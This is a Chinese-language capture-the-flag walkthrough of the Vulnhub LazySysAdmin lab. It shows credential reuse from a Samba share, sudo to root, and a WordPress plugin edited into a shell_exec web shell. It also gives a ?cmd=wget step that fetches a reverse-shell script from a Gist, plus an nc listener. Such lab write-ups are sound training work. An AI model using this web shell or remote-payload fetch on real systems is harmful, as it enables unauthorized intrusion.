Vulnhub-LazySysAdmin 通关指南
字数 1308 2025-08-29 08:32:30
Vulnhub-LazySysAdmin 通关指南
背景介绍
LazySysAdmin 是 Vulnhub 上的一个渗透测试靶机,难度为中等/初学者级别。该靶机旨在:
- 教授初学者基本的 Linux 枚举技巧
- 帮助学习者熟悉 Linux 服务配置
- 最终目标是获取 root 权限并找到 flag
关键提示:
- 枚举是关键
- 需要耐心尝试
- 不要错过明显的信息
信息收集阶段
网络扫描
- 使用
netdiscover确定靶机 IP - 使用
nmap扫描开放端口,发现以下服务:- MySQL
- InspIRCd (聊天服务器)
- Samba (Windows 与 UNIX 文件共享服务)
Web 服务枚举
- 80 端口运行着一个静态 HTML 页面
- 目录扫描发现:
- phpMyAdmin
- WordPress
WordPress 发现:
- 用户名:admin
- 主题:twentyfifteen v1.8
- 无插件安装
- 页面中多次重复 "My name is togie"
Samba 服务利用
-
发现两个共享:
printf$(打印机,无法连接)share$(可访问的共享文件夹)
-
在共享文件夹中发现 WordPress 站点目录,可以下载文件
关键文件:
deets.txt内容:CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345
攻击路径一:SSH 直接登录
-
尝试使用用户名
togie和密码12345登录 SSH- 成功登录,但发现是受限 shell (rbash)
-
检查 sudo 权限:
sudo su- 使用相同密码成功提权到 root
-
获取 flag
注意:这可能是非预期解,体现了"懒惰管理员"的主题
攻击路径二:WordPress 渗透
数据库凭证获取
-
从 WordPress 配置文件
wp-config.php中获取数据库凭证 -
尝试通过 phpMyAdmin 写 shell,但发现功能受限
WordPress 管理员登录
-
尝试使用数据库密码作为 WordPress 管理员密码
- 成功登录 WordPress 后台
-
通过修改插件代码实现 RCE:
- 编辑 "Hello Dolly" 插件,添加代码:
$lyrics = "<pre>".shell_exec($_GET['cmd'])."</pre>"; return wptexturize($lyrics);
- 编辑 "Hello Dolly" 插件,添加代码:
-
通过 Web 执行命令:
http://靶机IP/wordpress/wp-admin/index.php?cmd=whoami
反弹 Shell 建立
-
上传反弹 shell 脚本 (可通过 Gist 等方式)
<?php // 反弹 shell 代码 ?> -
使用 wget 下载到靶机:
?cmd=wget https://gist.githubusercontent.com/.../rev.php -
攻击机监听:
nc -lnvp 2333 -
访问 rev.php 获取 shell
-
升级为完整 TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
总结与经验
- 渗透测试需要多角度尝试,往往有多种攻击路径
- 信息收集阶段至关重要,所有发现都应记录
- 管理员常见错误:
- 密码复用
- 敏感信息明文存储
- 不及时清理临时凭证
- 防御建议:
- 定期更换密码
- 严格控制文件权限
- 删除不必要的敏感文件
- 限制 sudo 权限
技术要点回顾
- 服务枚举:nmap, dirb/dirbuster
- Samba 利用:smbclient
- WordPress 测试:WPScan
- 受限 shell 绕过:rbash 限制突破
- Web Shell:通过插件修改实现 RCE
- 权限提升:sudo 滥用
通过这个靶机,学习者可以掌握基本的服务枚举、凭证利用和权限提升技巧,理解系统管理员常见的安全疏忽。